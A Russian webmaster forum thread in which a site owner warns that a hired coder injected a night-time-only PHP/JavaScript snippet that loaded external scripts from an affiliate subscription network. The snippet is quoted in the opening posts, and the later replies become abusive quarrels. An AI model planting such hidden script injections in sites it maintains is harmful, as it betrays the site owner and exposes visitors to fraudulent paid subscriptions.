Внимание на форуме крыса «Орел»
1.
Дмитрий (04.07.2014 / 13:09)
Всех приветствую! Хотел написать не большую историю,целью которой будет предупреждение о том,чтобы вы были аккуратнее с теми людьми которым доверяете свои сайты.
Месяц назад,посещаемость сайта, стала резко расти и мне потребовалось, срочно оптимизировать скрипт,так как время генерации страниц оставляло желать лучшего, следовательно для этих целей мне необходимо было найти срочно программиста, вот даже моя тема
http://visavi.net/forum/topic.php?tid=40714 когда я искал его.
Один из тех кто откликнулся на эту тему, был кодер под ником Орел ( профиль
http://visavi.net/pages/user.php?uz=orel )
Так как раньше,у меня уже был удачный опыт работы с этим человеком,свой выбор конечно сделал в пользу него.
Работу сделал,скрипт оптимизировал ему подкинул еще пару хороших заказов и мы пожимая руки друг другу (образно) за хорошую сделку, попрощались.
В последнее время,у меня было очень много работы в реале и следить за своими сайтами времени небыло. Единственное, что я делал как «оптимизатор» просматривал статистику и анализировал индексацию страниц в ПС,и заметил резкий спад трафика с Гугла, именно у этого сайта. В связи с этим у меня уже тогда были мысли,что на моем сайте есть какая то «бяка» которая привела к этому спаду. И вы не поверите,точно! При анализе кода страниц,я обнаружил код следующего содержания
<? if (date("H") >= 00 && date("H") <= 07): ?>
<script type="text/javascript" src="http:// jsfiles.com /?s=39&r=20347"></script>
<script type="text/javascript" src="http://jsfiles.com/?s=97&r=20347"></script>
Первым делом, конечно,я его удалил, сменил везде пароли. А потом стал вычислять, этого гаденыша, который поднасрал на моем сайте.
2.
Дмитрий (04.07.2014 / 13:09)
Сначала пробил адрес по whois jsfiles.com ,кому принадлежит этот домен. Владельцем данного платника оказалась партнёрка
http://loadpays.com/.
Я связался с представителями данной партнёрской программы. Они подтвердили, что платник действительно принадлежит им. Следствии чего,я решил сранить кошлек Орла (кто последний работал над моим сайтом) с кошельком владельца аккаунта в этой партнёрки
http://prntscr.com/3z9pl6 - скрин переписки.
И кошелек действительно совпал)))
Далее, на мое имя переоформили аккаунт с теми подписками который были заработаны с трафика моего сайта. И я смог про анализировать, за какую сумму человек готов стать крысой? Сумма выплат, за весь период (нахождения этого кода у меня на сайте, с 23 июня по 3 июля 2014 года) составила 254 рубля. То есть за сранных 254 рубля,этот человек готов пожертвовать свой репутацией и стать крысой.
Поэтому, цель данного поста, не о том, чтобы рассказать, какой он плохой, а я хороший, (я и сам лоханулся в этом моменте,на самом деле).
Цель в первую очередь, предупредить вас,быть внимательней когда вы обращаетесь к таким нищекодерам ,даже если у них хорошая репутация (кстати он даже участвовал здесь в каком то конкурсе.) И все те, кто обращался к этому человеку проверьте свои сайты на левые JS коды.
3.
Дмитрий (04.07.2014 / 13:20)
Так же хочу выразить благодарность владельцам партнёрской программы
http://loadpays.com/ за оперативный отклик и принятие решений.
4.
NicAn (04.07.2014 / 13:25)
никогда не зарегаюсь в этой пп, сдаюсь своих партнёров
5.
Viy (04.07.2014 / 13:25)
3.
d0dgers, Доступ к веб-странице заблокирован. Показать URL-адрес
http://loadpays.com
Страница находится в списке веб-сайтов с потенциально опасным содержимым.
6.
Дмитрий (04.07.2014 / 13:40)
NicAn (4 Июля 2014 / 13:25)
никогда не зарегаюсь в этой пп, сдаюсь своих партнёров
Я бы и так об этом узнал.)) Угадай какой там логин был? Конечно, Orel )))) тоесть он даже по логину спалился.... логин я узнал когда передали мне аккаунт,так как подписки были заработаны с трафа моего сайта. Даже потоки трафика он назвал как Orel )))
7.
NicAn (04.07.2014 / 13:40)
5.
Viy, и чё?
Добавлено через 05:41 сек.
6.
d0dgers, просто добродушные админы, мало того, что сообщили информацию о кошельке, так ещё и передали тебе аккаунт со всеми бабками. У меня был похожий случай кстати, тоже взломали один сайт и повесили редирект на пп зипвап, написал им в тикет, мол так и так, я админ сайта, и хочу узнать кто этот мерзавец. На что мягко говоря был послан на йух, при этом надо учесть, что работал с этой пп больше года, было обидно конечно, но я бы тоже так поступил на их месте )
Почему так мало бабла получилось? вроде трафика неплохо на сайтах у тебя ) и кош чё не блокаешь?
8.
Дмитрий (04.07.2014 / 13:58)
Все зависит от того,какие правила в партнерской программе. У них в правилах написано,что траф с ломаных сайтов запрещен. Именно это мне и помогло. Кстати, я даже не просил их,о том,чтобы мне передали аккаунт. Я просто попросил, наказать виновника. Конечно,мне не просто так взяли и предоставили этот аккаунт,я сначала подтвердил свои права на владении сайтом. По поводу бабла,ну ты знаешь,на подписках сразу много не заработаешь,они же как,со временем накапливаются,а потом идут ежедневные ребилы,я просто этот момент вовремя заметил и присек (код весил где то неделю).
<? if (date("H") >= 00 && date("H") <= 07): ?> причем судя по этому коду,он связан со определенным отрезком времени,только чего? со временем когда нужна лить траф на партнёрку? если да,тогда получается код срабатывал только ночью?
Поводу абузы в WebMoney думаю,хорошая идея,нужно отписать.
9.
Дмитрий (04.07.2014 / 14:53)
Проблема здесь состоит даже не в том, что кто то заработал бабла с твоего сайта. Это не те деньги, чтобы сильно заморачиваться. Обидно и основная проблема состоит в том, к каким санкциям может привести этот код который стоял на сайте. Начиная попадание в базу антивирусников и заканчивая попадание под фильтры ПС.
10.
Wapwa (04.07.2014 / 15:14)
9.
d0dgers,а что у тебя за сайт?)
11.
Geor (04.07.2014 / 15:55)
Вспоминается похожий случай с админом 7ob.ru ))
12.
Tegos (04.07.2014 / 16:30)
Geornyaga (4 Июля 2014 / 13:55)
Вспоминается похожий случай с админом 7ob.ru ))
a что с ним?
13.
iNeeXT (04.07.2014 / 16:34)
<? if (date("H") >= 00 && date("H") <= 07): ?> причем судя по этому коду,он связан со определенным отрезком времени,только чего?
JS подключался после 24:00 до 07:00 утра.
14.
Amindar (04.07.2014 / 23:54)
11.
Geornyaga, какой же вы всё-таки низкий человек и паразит! Я ведь тогда вам всё обьяснил, что ошибся папкой и файлом на Денвере, т.к. граббер фильмов, который я вам делал тоже стоял на сайте r*** и тот код пренадлежался для него, а вы заладили маскировка - маскировка, детсад ей-богу! Вывели всё на эмоции и отказались меня выслушать. Если бы я знал, что вы такой ублюдок... на форуме ещё пишите, скотина!
15.
Geor (05.07.2014 / 02:23)
14.
Amindar, Итак, во первых, я Вас не оскорблял ни тогда, ни сейчас.
Во вторых, давайте подумаем, код я нашел только на своем сайте, проверил Ваши сайты, там и не пахло этим кодом. И скажите мне кто нибудь, зачем шифровать ссылку на подписки и невидимые счетчики когда по словам этого человека, скрипт делался для себя, в голову приходить только одна мысль - чтоб я не увидел чужую ссылку.Зачем себе усложнять работу потом по раскодированию и закодированию ссылку? Сколько видел платников на всякие подписки и прочее такого никогда не встречал. Так что не надо играть эту роль невинной овечки
16.
Amindar (05.07.2014 / 08:32)
15.
Geornyaga, послушайте вы, позорный волк в овечьей шкуре, кто вы вообще такой, чтобы судить человека исходя их своих тупых домыслов?!! Это раз! Далее.
Вы на моих сайтах не могли видеть код, т.к. его видо было только с мобилок! Это два!
То что я кодировал ссылку - это вас вообще не должно касаться, и не ваше дело! Это три!
И вообще, хоть на йоту поразмышляйте своим скудным умишком, неужели бы я так и оставил свои ссылки открытыми для компьютеров, чтобы меня спалили?! Я не идиот как вы! Это четыре!
И ещё. Живите дальше своими догадками, обвиняя людей во всех смертных грехах, доказывая всем, что вы просто самовлюбленный критин без понимания! Не судите людей по себе!
17.
Александр (05.07.2014 / 10:33)
неадекват детектед
18.
Zдешний (05.07.2014 / 11:58)
[deleted]
19.
Geor (05.07.2014 / 12:31)
16.
Amindar, в принципе Ваши слова сами говорят о Вас.
Я не хочу вообще с Вами говорить, и еще, ясень пень что я с телефона проверял, ведь редирект для них. Я Вам тогда все сказал.
И все мои слова может подтвердить человек, который является сисадмином данного сервера, это он нашел код.
20.
Quadratik (05.07.2014 / 20:29)
Какие все вежливые :-D
21.
Amindar (05.07.2014 / 22:10)
19.
Geornyaga, ваши поступки говорят о вас, что вы подлец, лицемер и балобол! Вы мне ТОГДА, ничего не сказали, вы просто эмоцианально и неадекватно понаписали всяко-разных идиотских, глупо-составленных предложений. И я вам ТОГДА всё обьяснил, и только идиот может поступать как вы поступили!
22.
NicAn (05.07.2014 / 22:18)
ребята, нам как-то по барабану, что у вас там, не нужно срaть тут, мы вас поняли, тема не про вас
23.
Amindar (05.07.2014 / 22:22)
22.
NicAn, прошу прощения, я просто не мог не ответить этому неугомонну подростку.
24.
dlloger (16.07.2014 / 01:36)
ничего не меняется тут с годами. все те же копеечные кидки и расследования
25.
Tegos (16.07.2014 / 05:17)
24.
dlloger, я думаю, меняется...
26.
Руслан (16.07.2014 / 06:42)
Самый тупой пиар))
27.
Amindar (29.07.2014 / 16:13)
26.
Fler, пиар чего, простите?
28.
Константин (29.07.2014 / 17:30)
Хитро придумано)
29.
Алексей (29.07.2014 / 19:24)
Повеселили Аминдар и Гео"как то там")))
30.
Amindar (03.05.2016 / 21:01)
byvlad, папка твой дуралей, что тебя утырком воспитал, в профиль минуса ставишь крыса! Займись лучше оптимизацией своих скриптов, видел я твой код, горе-кодер! И дальше задницу лежи этому балобольщику Geornyaga, который мне изначально писал с пафосом, мол он и сам знает PHP просто времени нет, да нифига он не умеет, только дизы воровать умеет и контент, и балоболить к тому же! Вы с ним два сапога - пара!
31.
Дмитрий (03.05.2016 / 21:29)
Amindar (3 Мая 2016 / 21:01)
byvlad, папка твой дуралей, что тебя утырком воспитал, в профиль минуса ставишь крыса! Займись лучше оптимизацией своих скриптов, видел я твой код, горе-кодер! И дальше задницу лежи этому балобольщику Geornyaga, который мне изначально писал с пафосом, мол он и сам знает PHP просто времени нет, да нифига он не умеет, только дизы воровать умеет и контент, и балоболить к тому же! Вы с ним два сапога - пара!
жаль машины времени нет, что бы вовремя в тему отвечать, а не через два года
32.
Amindar (04.05.2016 / 02:51)
Я здесь вообще не бываю практически, и минус с выпадом от этого субъекта только сегодня заметил. )) Да и никогда не поздно ответить, пусть знает, кто он и что он.
33.
Владислав (06.05.2016 / 19:19)
30.
Amindar, время прошло, а ты как был дном, так и остался
34.
Amindar (06.05.2016 / 21:13)
byvlad, ты кусок идиота, не зная человека, так рассуждать! Тупо исходя из бредовых домыслов пафосного ублюдка - админа гегаса! Где бабки платят там теплее, да? Да ты просто cyкa после этого, гнида и жополиз, больше нечего добавить.
35.
jack (06.05.2016 / 23:10)
И - импульсивность
36.
Владислав (08.05.2016 / 19:06)
34.
Amindar, при чём здесь пафос? я там не работаю, я нигде не работаю. просто если ты ***, не оправдывайся, все и так знают что это так.
37.
Amindar (09.05.2016 / 04:14)
byvlad, дурку врубать ты конечно мастак. Поищи определения слова "пафос" если знаний не хватает. Я не оправдываюсь, я защищаюсь - это два разных понятия. Тебе, мразь, кто давал право не зная человека и истины, осуждать человека? Только идиоты могут на своих тупых домыслах и догадках, определять кем является человек. Гнида ты, вот ты кто.
38.
Евгений (09.05.2016 / 08:49)
Узнаю висави))))
Опять два бакса не поделили, бизьнесьмены
39.
Дмитрий (09.05.2016 / 21:23)
37.
Amindar, 34 ком. Два года, рассуждать, человека, ...
Или вы на днях поругались, или как говорится, не тронь говно...
40.
ramzes (10.05.2016 / 00:00)
прикольный срач))
41.
Евгений (10.05.2016 / 01:18)
За какие бабки разговор то?
А вообще, все вопросы решаются сразу и на месте, вы оба проволо#били свой момент - есть предъява - кидай абузу на вм) вы оба себя не с хорошей стороны показываете.
ПС, вантуз, верни сортир на форум))))
42.
Евгений (10.05.2016 / 10:08)
44.
Amindar, читать 5 страниц срача на висави?))) поэтому и спросил в чем дело то, мне то без разницы вообще, интересно стало сколько копеек опять не поделили, раз кто то крыса
43.
Amindar (10.05.2016 / 13:06)
45.
Nover, ну раз без разницы, зачем спрашивать? )) Никто не крыса, тема вообще никого не касается, просто моё "имя поганили" просто так "без разбора", я встал на свою защиту. А этот тупоголовый
byvlad, не зная ситуации в личку минус поставил ещё и обозвал, просто так, между прочим... Вот я и не годую по этому поводу.))
44.
/7o/loTeH4I1k (10.05.2016 / 14:46)
46.
Amindar, а доки выложенные в первом посте? Это "имя поганили" без разбора? Помоему ТС как раз таки разобрался в ситуации, не?
45.
Amindar (10.05.2016 / 15:11)
47.
anonymouse, вы не внимательны, я к ТС не имею никакого отношения.
46.
Дмитрий (10.05.2016 / 18:31)
ухх как давно это было)))
47.
/7o/loTeH4I1k (10.05.2016 / 21:25)
48.
Amindar, да, действительно, приношу извинения.
48.
Amindar (10.05.2016 / 21:55)
50.
anonymouse, да ничего страшного. ))
49.
Amindar (11.05.2016 / 15:21)
39.
Дифенгидрамин, у гавнюков одно гaвнo на уме, свои размышления туда же себе же засунь...
URL:
https://visavi.net/topics/40937